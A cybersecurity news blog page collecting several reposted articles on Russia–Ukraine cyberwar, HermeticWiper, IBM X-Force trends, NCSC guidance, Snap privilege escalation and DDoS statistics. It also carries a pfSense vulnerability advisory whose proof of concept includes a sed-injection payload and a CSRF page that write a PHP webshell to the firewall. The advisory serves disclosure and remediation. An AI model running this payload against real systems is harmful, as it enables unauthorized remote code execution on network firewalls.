Monday, January 20, 2025
Home Blog Page 44

Russia, Ukraine and the Danger of a Global Cyberwar

By
Steven Black (n0tst3)
-
0

A conversation with Marcus Willett, former director of cyber at GCHQ

On the morning of February 22, 2022, the world woke to the news that Russia had moved troops into two separatist regions of eastern Ukraine. At the time of writing, it is not yet a full invasion of Ukraine, but Russia did conduct attacks on February 24, hitting cities with airstrikes and artillery in what was called a “special military operation” by Russian President Vladamir Putin.

Just before this maneuver, SecurityWeek spoke to Marcus Willett to get insight into the role of cyber in aggressive geopolitics. Willett is senior advisor for cyber at the International Institute for Strategic Studies where he researches the use of cyber and related technologies as levers of national power. Before then, he had worked at the UK’s GCHQ for 33 years, including roles such as the agency’s first director of cyber.

The background

Strategically, Ukraine is the soft underbelly of Russia. As an ally, Ukraine is a bulwark against NATO. As a member of NATO, it would be a Russian weakness. Preventing this weakness and keeping NATO at least an arm’s length from the heart of Russia, is one purpose of Russian behavior. 

But it shouldn’t be ignored that Russia has been increasingly bellicose over the last two decades – including, for example, the invasion of Georgia in 2008 and the almost uncontested annexation of Crimea in 2014. The extent of Putin’s desire to return Russia to the height of its global influence as the USSR should not be ignored.

The big difference between the Russia of the USSR and the Russia of today has been the emergence of cyber as an accepted theater of war. It is this role of cyber that SecurityWeek discussed with Marcus Willett.

Cyber softening

Russia has been waging its own cyberwar against Ukraine for many years. For example, on December 23, 2015, Russian attackers accessed SCADA systems in three Ukrainian electricity distribution companies, opened breakers in about 30 substations in Kiev and western Ivano-Frankivsk, and caused a loss of power to more than 200,000 customers. On December 17, 2016, a single transmission substation in northern Kiev lost power.

In June 2017, Russian actors hijacked the updater process of Ukrainian accounting software firm MEDoc and delivered a wiper malware named NotPetya to MEDoc customers. Its worm capabilities subsequently led to the wiper vary rapidly spreading around the world. There are many other examples of disruptive Russian cyber operations against Ukraine between 2014 and the present.

Since the beginning of 2022, however, it seems that Russian cyber activity against Ukraine has increased. This includes evidence that wiper malware has again disrupted some Ukrainian government networks, and attacks from the FSB-linked Gamaredon have targeted around 5,000 entities, including critical infrastructure and government departments. So far, however, there has not been the same scale of disruption as occurred in 2015, 2016 and 2017.

Danger of a Global Cyberwar

The purpose of such cyber activity is to weaken critical infrastructure, damage government’s ability to respond to any aggression, and to demoralize the population. The advantage of conducting the initial stages of kinetic activity in cyber is the inherent perceived impossibility of accurately attributing the action to any specific aggressor. Noticeably, Putin has consistently denied any Russian (government) involvement in any of this activity.

“What is unknown,” Willett told SecurityWeek, “is the extent to which Russian actors are now embedded undetected within the Ukrainian critical infrastructure – and particularly the electricity grid. This would be the classic use of cyber operations to prepare the battlefield for physical invasion. In the past, cyber activity preceded the physical action in Georgia and Crimea by around two weeks – but Russia may be able to move faster this time.”

There is, however, a major difference between the Crimea and Ukraine incidents. The West seemed largely unprepared on how to respond over Crimea. This time, America has learned the lesson and has been controlling the narrative from the beginning. The U.S. and NATO have signaled very clearly that it knows what Russia is doing and how the allies will respond. The U.S. has liaised closely with its European allies, and sanctions have already begun. Blocking Russian gas exports to Europe will hurt Russia’s economy, while withholding tech exports could also hurt Russian industry. The message is very clear: a physical war with Ukraine could lead to a sanctions war with America and Europe – and that is one war that the relative economic minnow cannot win.

Widespread cyberwar and attribution

The U.S. has been warning the rest of the world against a potential widening scope of Russian cyber activity, and that cyber defenses generally should be tightened. 

“Part of the worry,” said Willett, “is that cyberattacks against Ukraine might bleed over, like NotPetya, to affect other countries and cause wider damage unintentionally. There is some concern that the Russians may intentionally do stuff more widely, but that would probably be in retaliation for something that the U.S. or NATO might do. 

“I suspect,” he continued, “the Russians will be bending over backwards to make sure that they don’t let their cyber operations against Ukraine spread like NotPetya and cause damage more widely, including in the U.S. and its NATO allies. But we may see an increase in Russian criminal gangs using ransomware against the U.S. and its allies. If any of the Russian government agencies got attributed for causing major damage in the U.S. and NATO, the consequences for Russia would be very serious. Nevertheless, we might well see an increase in Russian cybercriminal activity, including the use of ransomware against the U.S. and its allies.”

This raises the whole question of ‘attribution’. The received belief is it is impossible to do accurate cyber attribution. “That is absolutely wrong,” said Willett. “The problem with attributing in the past has not been a lack of confidence in knowledge, it’s been an inability to release the information in a way that doesn’t jeopardize sources. But over the years, states have become more confident in what they are able to reveal safely, have acknowledged there are thresholds where the risk is acceptable, and the private sector has become more capable in putting together the cyber jigsaw to come up with an accurate conclusion.”

This has allowed the U.S. to be sufficiently confident to indict not just countries but named individuals in both China and Russia. The attacking governments can deny this and claim the U.S. justice system is corrupt, but the effect of being attributed collectively by multiple allied states who say, ‘we know it was you’ is damaging to international reputation. “It would be a mistake for any one nation to think it could attack another without being known,” said Willett.

The danger of accidental global cyberwar

But accidents happen. The two iconic cyberweapons have been Stuxnet and NotPetya. It is assumed that the U.S. developed Stuxnet (although this has never been admitted). NotPetya has been confidently attributed to the Russian government. Both malwares escaped from their assumed targets into the wider world. This was probably accidental – but similar accidents could lead to wider implications during a period of global geopolitical tension.

“The U.S., UK and other like-minded states have declared their intent to use their cyber power responsibly, without giving many indications as to what precisely this means. Comparing Stuxnet and NotPetya is one way of illustrating the difference,” said Willett. 

NotPetya was an uncontrolled worm released through a global IT vulnerability that – surprise, surprise – spread beyond the intended target and affected the operating system of any system it landed on. “Stuxnet,” continued Willett, “was very targeted. Yes, it spread beyond the intended target, but it could only cause damage if the specific software that made a centrifuge spin was present (with lots of other conditions). The controlled Stuxnet and the uncontrolled NotPetya illustrates the difference between responsible and irresponsible use of cyber power.”

Willett believes that the U.S. will do its utmost to maintain the principle of a responsible use of cyber power. “If not,” he said, “they end up playing the same game as the Russians, the Chinese, Iran and North Korea. This would leave much of the rest of the world thinking that what the Russians and others have been demanding – new international treaties and conventions to increase the control by governments of their sovereign piece of cyberspace – is the only solution.” The problem is that this is code, in authoritarian states, for mass internal censorship and surveillance, and is the opposite of the ‘free internet’ that we would like to see endure. “So, there are strategic reasons for any U.S. or NATO cyber operations to be very carefully judged to maintain cyber responsibility rather than simply to respond like-for-like.” 

In the other direction, Willett doesn’t believe the Russian state will be tempted to run destructive cyber operations against the U.S. and its allies. “They might,” he added, “if subsequent sanctions are particularly brutal; but that would be a mistake – it would be another ‘internationally wrongful act’ under international law, and would invite even more stringent countermeasures and even more international opprobrium.” 

In the end, you can’t help feeling that there’s a longer game here: both sides are struggling to understand the potential of cyber in war. Can cyber capabilities be used to have a deterrent effect, can they prepare the battlefield, could they be used for countermeasures against an aggressor? “These have largely been intellectual and doctrinal discussions to this point, but might now be tested in reality with unpredictable results. We are at a very dangerous moment. We should perhaps remember that, before the current Ukraine crisis, Biden said that it would most likely be as the consequence of a cyber breach that the U.S. would find itself in a real shooting war with a major power.”

Nevertheless, the overriding impression given by Marcus Willett is that both sides (this excludes any action or opportunity taken by China, Iran or North Korea) will do everything possible to avoid the actuality of a Russia/Ukraine cyberwar spreading to the wider world. But ‘unintended consequences’ is a risk in all IT and security – and unintended consequences are hard to predict or control.

Latest

As this article was completed, the physical invasion of Ukraine began. On the morning of February 24, 2022, Russian troops invaded Ukraine. This was accompanied by a further increase in cyber activity.

Associated Press reported another wave of DDOS attacks against Ukraine’s parliament and other government and banking websites, while ESET has detected new wiper malware on “hundreds of machines in the country”.

Although ESET did not name the targets beyond saying they were ‘large organizations’, Symantec has described three: a financial institution in Ukraine, and government contractors in Latvia and Lithuania. This adds a further geopolitical complication — although Ukraine itself is not a member of NATO, both Latvia and Lithuania are members.

One thing is clear: the marriage of cyber and kinetic warfare has been consummated.

Note: Anything not quoted from Marcus Willett is the opinion of the author.

source

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Destructive HermeticWiper Malware Targets Computers in Ukraine

By
Steven Black (n0tst3)
-
1
malware

Just as Russia was preparing to launch an invasion of Ukraine, Ukrainian government websites were disrupted by DDoS attacks and cybersecurity firms reported seeing what appeared to be a new piece of malware on hundreds of devices in the country.

The new malware, dubbed “HermeticWiper” by the cybersecurity community, is designed to erase infected Windows devices. The name references a digital certificate used to sign a malware sample — the certificate was issued to a Cyprus-based company called Hermetica Digital.

“At this time, we haven’t seen any legitimate files signed with this certificate. It’s possible that the attackers used a shell company or appropriated a defunct company to issue this digital certificate,” explained endpoint security firm SentinelOne, whose researchers have been analyzing the new malware.

The malware has also been analyzed by researchers at ESET and Symantec. Each of the companies has shared indicators of compromise (IoCs) associated with HermeticWiper.

ESET first spotted HermeticWiper on Wednesday afternoon (Ukraine time) and the company said hundreds of computers in Ukraine had been compromised.

Ukrainian Banks & Defense Ministry Hit with “Powerful” DDoS Attack
RELATED READING

ESET noted that the malware samples it observed were compiled in late December 2021, which suggests the attack might have been in the works for nearly two months.

Research conducted by the cybersecurity firm suggests that at least in one case the malware may have been delivered after attackers took control of a victim’s Active Directory server.

The wiper abuses legitimate drivers associated with an application called EaseUS Partition Master. It attempts to corrupt the master boot record (MBR) of every physical drive, as well as every partition on these drives.

This is the second destructive malware attack aimed at Ukraine in 2022. In January, threat actors defaced Ukrainian government websites and unleashed wiper malware named WhisperGate, which had been disguised as ransomware.

While the cybersecurity companies analyzing HermeticWiper have not attributed the malware to any known threat group — given the current situation — the most likely culprit is Russia. In the case of the wiper malware used in the January attacks, Ukraine said it had evidence that Russia was responsible.

You may enjoy reading, Microsoft, Apple and Google top the list of the most spoofed brands in 2021

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Microsoft, Apple and Google top the list of the most spoofed brands in 2021

By
Steven Black (n0tst3)
-
0

IBM’s 2022 X-Force Threat Intelligence Index also revealed that ransomware was again the top attack type last year and that manufacturing supply chains were most vulnerable to exploitation

Microsoft, Apple and Google were the top three brands criminals attempted to mimic in 2021, according to IBM’s newly released X-Force Threat Intelligence Index. The industry-leading brands were used repeatedly in phishing kits, with attackers likely seeking to capitalize on their popularity and consumers’ trust, the Index said.

Cybercriminals used the brands as a disguise to steal consumers’ information or infect their devices with malware. Of the phishing kits that X-Force analyzed, an overwhelming number targeted email/ID/password combination, while scammers and cybercriminals attempted to gain access to credit card data in the majority of instances, the Index said.

The other brands that made the list were BMO Harris Bank, Chase, Amazon, Dropbox, DHL, CNN, Hotmail and Facebook, IBM said.

Ransomware, phishing remain top techniques

While ransomware was the number one attack observed by X-Force last year, attacks declined slightly to 21% from 23% the previous year. REvil ransomware actors were responsible for 37% of all attacks, the report said.

Another finding was that ransomware gangs had an average lifespan of 17 months before rebranding or disbanding. REvil, one of the most successful gangs, shut down in October 2021 after 31 months, the Index said.

Meanwhile, 41% of attacks were the result of phishing for initial access, which emerged as the top pathway to compromise in 2021, the Index said.

Other key highlights from the 2022 Index include:

  • Hitting consumers’ wallets–Ransomware attacks dominated manufacturing in 2021, contributing to marked-up product/services prices and burdening consumers already dealing with inflation at a near 40-year high. For example, by the end of 2021, ground beef prices rose 10% following the JBS ransomware attack and gas prices increased 10% following the Colonial Pipeline ransomware attack.
  • A Rising “debt” of vulnerabilities–With a record number of disclosed vulnerabilities in 2021, X-Force saw 33% rise year over year in the number of network compromises caused by vulnerability exploitation, revealing businesses’ biggest vice: patching. Businesses in Europe, Asia and the Middle East and Africa were virtually overpowered by unpatched vulnerabilities, which caused about 50% of attacks in these regions in 2021.
  • “Manu-fractured” supply chains–Manufacturing was the most attacked industry in 2021, accounting for nearly one in four attacks with ransomware persisting as the main culprit. Nearly half of attacks on manufacturing were caused by vulnerabilities.
  • Early warning signs of cyber crisis in the cloud–With a 146% increase in new Linux ransomware code and a Docker-focused push expanding beyond just bots, it’s becoming easier for threat actors to utilize cloud environments for malicious purposes.

How brands and consumers can fight back

The fact that manufacturing has replaced financial services/insurance as the most targeted industry for attacks was a notable finding, said Charles DeBeck, senior cyber threat intelligence analyst at IBM Security X-Force.

“It’s only now at a time when the manufacturing industry is at a tipping point that cybercriminals predominantly shifted their sights to this sector, seeking to push it over the edge,’’ DeBeck said. “That tells us that attackers are wagering on the real-world repercussions an attack on these organizations would have–not only are they betting on the victim’s fear of financial/business loss … but they bet on supply chains’ reliance on these organizations, adding even more pressure on victims to pay.”

He added that a manufacturer loses money every second its operations are down, making the industry “a particularly juicy target for ransomware actors.”

One takeaway is that successful brands will continue to find themselves in the spotlight, and that will inevitably draw cybercriminals’ attention, DeBeck said. “We saw some of the most trusted tech brands amongst the companies scammers most commonly impersonated,’’ because they’re betting on the familiarity and positive experience that consumers have with them. That leads consumers to let their guards down and be more likely to click on a malicious URL.

“Consumers need to scrutinize links more and be more skeptical about emails and texts they receive, because the person or brand on the other end may not be who they think it is,’’ he advised.
Today’s digital acceleration combined with the adversarial trends Security X-Force is seeing become more common, makes it clear that where businesses keep their data matters, DeBeck added.
“Businesses need to become more intentional about what data remains on-premises and which migrates to cloud environments,’’ he said. “Because with modernization, when the right data is placed in the right environment, the business can have better control, oversight and security over its workloads, including who has access to it and why.”

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Hackers are targeting this ‘easy target’. Here’s how to protect yourself

By
Steven Black (n0tst3)
-
0
ncsc national cyber security

Guidance from the NCSC urges small businesses in construction to boost their cybersecurity as hackers see a tempting target.

Construction firms are being offered tailored advice on how to protect themselves from cyber attacks and other online threats in new guidance from the National Cyber Security Centre (NCSC),  the cybersecurity arm of intelligence agency GCHQ.

The new ‘cyber security for construction businesses‘ guide is designed to provide practical advice to organisations in the construction industry on how to protect businesses and building projects from cyber threats.

The report warns that the construction industry faces threats from cyber criminals, ransomware gangs, malicious insiders and nation-state hacking operations.

“Recent high profile cyber attacks against the construction industry illustrate how businesses of all sizes are being targeted by criminals,” NCSC said.

Construction businesses are seen by cyber criminals as an “easy target”, the guide said, as many have high cash-flows, while the extensive use of sub-contractors and suppliers involving large numbers of high value payments makes construction businesses an attractive target for spear phishing.

“As construction firms adopt more digital ways of working, it’s vital they put protective measures in place to stay safe online – in the same way you’d wear a hard hat on site,” said Sarah Lyons, NCSC director for economy and society resilience.

“By following the recommended steps, businesses can significantly reduce their chances of falling victim to a cyber attack and build strong foundations for their overall resilience,” she added.

The guidance offered includes advice on securing office equipment from malware and other cyber attacks, including that IT equipment is kept up to date with the latest security patches, ensuring that only approved apps are downloaded and that there are controls around how USB sticks and other removable media are used, as well as controls around how IT equipment can be accessed by third parties and suppliers.

Other guidance includes avoiding the use of predictable passwords, changing default passwords, using multi-factor authentication across all important accounts and other techniques which can help businesses avoid falling victim to phishing emails and other cyber attacks.

Organisations should also make plans around incident response, including regularly updating offline backups and to establish plans on how they would deal with different cyber attacks, should they face them.

The NCSC suggests that construction firms can do this using their free ‘Exercise in a Box’ product, which provides businesses with a means of testing their resilience and preparedness based on real cyber threat scenarios.

The guidance is designed to be easy-to-understand in order to provide the construction, building suppliers and related industries with information that can protect them from the most common cyber attacks. Senior members of the industry, as well as IT departments are urged to take the opportunity to examine how they can improve their cybersecurity defences to help avoid becoming a victim.

“The consequences of poor cyber security should not be underestimated. They can have a devastating impact on financial margins, the construction programme, business reputation, supply chain relationships, the built asset itself and, worst of all, people’s health and well-being. As such, managing data and digital communications channels is more important than ever,” said Caroline Gumble, Chief Executive of the Chartered Institute of Building (CIOB),

“This guide provides a timely opportunity to focus on the risks presented by cybercrime,” she added.

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

source

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Remote Code Execution in pfSense <= 2.5.2

By
Steven Black (n0tst3)
-
0

(RCE) Remote Code Execution in pfSense

Summary

pfSense allows authenticated users to get information about the routes set in the firewall. The information are retrieved by executing the netstat utility and then its output is parsed via the sed utility. While the common prevention patterns for command injections (i.e. the usage of the escapeshellarg function for the arguments) are in use, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location. This vulnerability could be also exploited pre-authentication as the vulnerable endpoint is also vulnerable to a Cross-Site Request Forgery (CSRF).

Product Description (from vendor)

pfSense® Plus software is the world’s most trusted firewall. The software has garnered the respect and adoration of users worldwide – installed well over three million times. Made possible by open source technology. Made into a robust, reliable, dependable product by Netgate.

CVE(s)

Details

Root Cause Analysis

vulnerability

pfSense while trying to show the routes set in the firewall executes the sed utility with some user-controllable input.
sed – a stream editor – is a powerful utility to perform text transformations and has quite a lot of commands which could be defined as a single command line argument semicolon-separated. The ability of adding multiple commands in one argument is the key for this vulnerability.

What is important to specify before diving into the exploitation details is that pfSense is based on FreeBSD, so all the GNU-specific arguments of sed (e.g. the e/exec argument which could be used to run a system command) are not available.

An excerpt of the vulnerable code follows:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 3135 if (isset($_REQUEST['isAjax'])) { 36 require_once('auth_check.inc'); 37 38 $netstat = "/usr/bin/netstat -rW"; 39 if (isset($_REQUEST['IPv6'])) { 40 $netstat .= " -f inet6"; 41 echo "IPv6\n"; 42 } else { 43 $netstat .= " -f inet"; 44 echo "IPv4\n"; 45 46 } 47 if (!isset($_REQUEST['resolve'])) { 48 $netstat .= " -n"; 49 } 50 51 if (!empty($_REQUEST['filter'])) { 52 $netstat .= " | /usr/bin/sed -e " . escapeshellarg("1,3d; 5,\$ { /" . htmlspecialchars($_REQUEST['filter']) . "/!d; };"); 53 } else { 54 $netstat .= " | /usr/bin/sed -e '1,3d'"; 55 } 56 57 if (is_numeric($_REQUEST['limit']) && $_REQUEST['limit'] > 0) { 58 $_REQUEST['limit']++; // Account for the header line 59 $netstat .= " | /usr/bin/head -n {$_REQUEST['limit']}"; 60 } 61 62 echo htmlspecialchars_decode(shell_exec($netstat)); 63 64 exit; 65 }

At line 51-52 it could be seen that if the request contains a filter parameter then its HTML special characters are converted to their HTML entities. Then the input is prefixed and suffixed by some hard-coded sed syntax, and finally everything is escaped by the escapeshellarg function, which prevents sub-commands or other arguments from being injected. At line 62 the command is finally executed.

As mentioned before it is possible to inject arbitrary sed syntax, having the only limitation that the input is encoded via the htmlspecialchars function. This allows to use the s/match/replace/ command to replace part of the netstat output with an arbitrary string and the w /path/to/file command to write the output of the sed command to an arbitrary location.

Wrapping everything together an attacker could set in the filter parameter the following string: .*/!d;};s/Destination/\x3c\x3fphp+system($_GET[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/a.php%0a%23 Which will result in the following command to be run:

/usr/bin/netstat -rW -f inet | /usr/bin/sed -e '1,3d; 5,\$ { /!d;};s/Destination/\x3c\x3fphp system($_GET[\x22a\x22])\x3b\x3f\x3e/;w /usr/local/www/a.php
#/!d; };'

As the netstat utility always outputs the Destination string, it was chosen to be replaced with <?php system($_GET["a"]);?> and then the output is written to /usr/local/www/a.php.

### Proof of Concept

  1. Login to pfSense
  2. Visit the following URL by replacing <target> with the IP address / domain of the target pfSense instance: http://<target>/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+system($_GET[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/a.php%0a%23
  3. Visit the following URL by replacing <target> with the IP address / domain of the target pfSense instance and notice that the id command has been executed: http://<target>/a.php?a=id

Impact

An authenticated attacker could write an arbitrary file to the pfSense disk. This can be abused to write a webshell to execute arbitrary code / commands.

It should be noted that due to a lack of Cross-Site Request Forgery (CSRF) protections for the vulnerable endpoint it is possible for an attacker to trick an authenticated admin into visiting a malicious website to exploit the vulnerability through the victim’s session/browser. More details are available in the Cross-Site Request Forgery advisory.

A proof of concept to exploit the vulnerability through the CSRF follows:

  1. Login to pfSense
  2. Create an HTML file with the following content by replacing <target> with the IP address / domain of the target pfSense instance:
1 2 3 4<meta name="referrer" content="no-referrer"> <script> window.location = "http://<target>/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3cscript\\x3eif\\x28location.pathname\\x21\\x3d\\x27\\x2fa.php\\x27\\x29\\x7blocation\\x3d\\x27\\x2fa.php\\x3fa\\x3did\\x27\\x7d\\x3c\\x2fscript\\x3e\\x3c\\x3fphp+system($_GET[\\x22a\\x22])\\x3b\\x3f\\x3e/;w+/usr/local/www/a.php%0a%23" </script>
  1. Visit the following URL by replacing <target> with the IP address / domain of the target pfSense instance and notice the 404 error: http://<target>/a.php?a=id
  2. Host the HTML page created at step 2 on a webserver and visit it in the same browser used for the other steps
  3. Notice that the Arbitrary File Write has been exploited to create a webshell in /usr/local/www/a.php and the victim is redirected to the webshell (http://<target>/a.php?a=id) to execute the id command

Remediation

Upgrade pfSense CE to version 2.6.0 or pfSense Plus to version 22.01.

Disclosure Timeline

Credits

  • Abdel Adim `smaury` Oisfi of Shielder

source

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.

Check out our CyberSecurity Knowledge Base, accepting submissions @ kb@realinfosec[.]net

Bookmark
Please login to bookmarkClose

Snap Privilege Escalation: Vulnerability in Linux Package Manager Snap

By
Steven Black (n0tst3)
-
0

A newly discovered Snap flaw allows a low-privileged user to gain root access.

Researchers found an easy-to-exploit vulnerability in Snap, a universal application packaging and distribution system developed for Ubuntu but available on multiple Linux distributions. The flaw allows a low-privileged user to execute malicious code as root, the highest administrative account on Linux.

Snap privilege escalation

The vulnerability, tracked as CVE-2021-44731, is part of a series of flaws that researchers from security firm Qualys found in various Linux components while investigating the security of Snap. This latest one, along with a separate issue tracked as CVE-2021-44730, are in snap-confine, the tool responsible for setting up Snap application sandboxes.

What is Snap?

Snap is a package manager for Linux systems that was developed by Canonical, the company behind the popular Ubuntu desktop and server distribution. It allows the packaging and distribution of self-contained applications called “snaps” that run inside a restricted container, providing a configurable level of security.

By being self-contained, Snap applications don’t have external dependencies, which allows them to work cross-platform or cross-distribution. Traditionally, each major Linux distribution maintains its own pre-packaged software repository and software manager. Debian has DEB, Ubuntu has PPA, Fedora and Red Hat have RPM, Arch Linux has Pacman, and so on. All these systems pull in the desired package along with all other dependencies as separate packages. Snaps, on the other hand, come bundled with all the needed dependencies, making them universally deployable on all Linux systems that have the Snap service.

Snap ships by default on Ubuntu and several Linux distributions and is available as an option in many others, including the major ones. It’s used to distribute not only desktop applications, but also cloud and IoT ones.

Snap confinement — the isolation feature — has three levels of security with the Strict mode being used by most applications. In this mode, applications need to request access to access files, other processes, or the network. This is not unlike the application sandboxing and permissions model from mobile operating systems like Android.

Since application sandboxing is one of the core features of Snap, any privilege escalation vulnerability that allows escaping that isolation and taking control of the host system is considered very serious.

Privilege escalation flaws

The Qualys researchers have dubbed their two snap-confine vulnerabilities as “Oh Snap! More Lemmings” because they follow another privilege escalation flaw discovered in Snap in 2019 and dubbed Dirty Sock. Since Dirty Sock, Snap has seen a thorough security audit by the SUSE security team and in general is programmed very defensively, making use of many kernel security features such as AppArmor profiles, seccomp filters and mount namespaces.

“We almost abandoned our audit after a few days,” the Qualys researchers said in their advisory, adding that “discovering and exploiting a vulnerability in snap-confine has been extremely challenging (especially in a default installation of Ubuntu).”

Nevertheless, the team spotted a few minor bugs and decided to push on. This resulted in the discovery of two privilege escalation vulnerabilities: CVE-2021-44730, a hardlink attack that’s only exploitable in non-default configurations, namely when the kernel’s fs.protected_hardlinks is 0; and CVE-2021-44731, a race condition that is exploitable in default installations of Ubuntu Desktop and near-default installations of Ubuntu Server.

“This race condition opens up a world of possibilities: Inside the snap’s mount namespace (which we can enter through snap-confine itself), we can bind-mount a world-writable, non-sticky directory onto /tmp, or we can bind-mount any other part of the filesystem onto /tmp,” the Qualys researchers said. “We can reliably win this race condition, by monitoring /tmp/snap.lxd with inotify, by pinning our exploit and snap-confine to the same CPU with sched_setaffinity(), and by lowering snap-confine’s scheduling priority with setpriority() and sched_setscheduler().”

In the process of investigating these flaws, the Qualys researchers have also discovered bugs in other related libraries and components that Snap uses: Unauthorized unmounts in util-linux’s libmount (CVE-2021-3996 and CVE-2021-3995); unexpected return value from glibc’s realpath() (CVE-2021-3998); off-by-one buffer overflow/underflow in glibc’s getcwd() (CVE-2021-3999); Uncontrolled recursion in systemd’s systemd-tmpfiles (CVE-2021-3997). These flaws were patched in those respective components earlier this year.

Ubuntu has released patches for CVE-2021-44731 and CVE-2021-44730 for most of its supported Linux editions, except for 16.04 ESM (Extended Security Maintenance) which is still awaiting a fix. Both vulnerabilities are rated as high severity.

You may also enjoy reading, Q4/21: Sees More DDoS Attacks Than Ever Before

source

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Q4/21: Sees More DDoS Attacks Than Ever Before

By
Steven Black (n0tst3)
-
1

DDoS attacks hit a sad all-time high in the last quarter of 2021. According to Kaspersky telemetry, The number of attacks in Q4 increased by 52% against the previous quarter and more than 4.5 times against the same period last year. The numbers look scary, but instead of rushing to conclusions, better to figure out why they are so.

This is 4,5 times higher than the same period last year. Kaspersky experts see the reasons, among other things, in the Christmas sales season and the increasing popularity of cryptocurrencies

Extremely high number of DDoS attacks

In a DDoS attack, cybercriminals send a large number of requests to the targeted web resource with the aim of restricting its service or temporarily paralyzing it. The attacks can last for several days and lead to massive disruptions in companies.

From October to the end of December 2021, Kaspersky researchers observed a massive increase in DDoS attacks, recording a record high in the entire history of the international cybersecurity company’s observation of this type of threat. The Kaspersky experts see a combination of several factors here: Usually, the last three months of a year are most frequently affected by DDoS attacks, online trade peaks due to sales around the holidays and the exam season for students begins. Cyber ​​criminals use this for their purposes, which leads to increased DDoS attacks.

Furthermore, Kaspersky experts saw an inverse proportionality between DDoS attacks and the cryptocurrency market. This is due to the fact that the capacities for organizing DDoS and mining cryptocurrencies are interchangeable – botnet owners tend to divert energy to mining when cryptocurrency is rising and to DDoS when it is falling.

Most DDoS attacks took place in the United States (43,55 percent), China (9,96 percent), Hong Kong (8,80 percent), Germany (4,85 percent) and France (3,75 percent). In Germany, DDoS attacks increased by 4 percent in Q2021 25 compared to the previous quarter, in Austria by 86 percent and in Switzerland by 48 percent.

“The DDoS threat landscape is constantly changing, reflecting current economic and societal trends,” comments Alexander Gutnikov, Security Expert at Kaspersky. “We expected an increase in DDoS attacks in the fourth quarter due to the selling season, but the unstable situation in the cryptocurrency market has pushed the DDoS landscape to a whole other level with an all-time high in the number of attacks. Based on the trends of the past few years, the first quarter of 2022 should not show a significant decrease in DDoS attacks. We therefore strongly advise implementing professional solutions to protect companies from DDoS attacks.”

Tips from Kaserpersky for businesses to protect against DDoS attacks

  • Keep web resources running by employing specialists who know how to respond to DDoS attacks.
  • Regularly validate agreements with third parties and contact information, including those with and from internet service providers. This helps teams quickly access agreements in the event of an attack.
  • Implement a professional solution like Kaspersky DDoS Protection [2] to protect against DDoS attacks
  • Comprehensive knowledge of your own data traffic is essential. The use of network and application monitoring tools can help to identify trends and tendencies in data traffic. By understanding an organization’s typical traffic patterns and characteristics, a baseline can be established to help identify unusual activity that may indicate a DDoS attack.
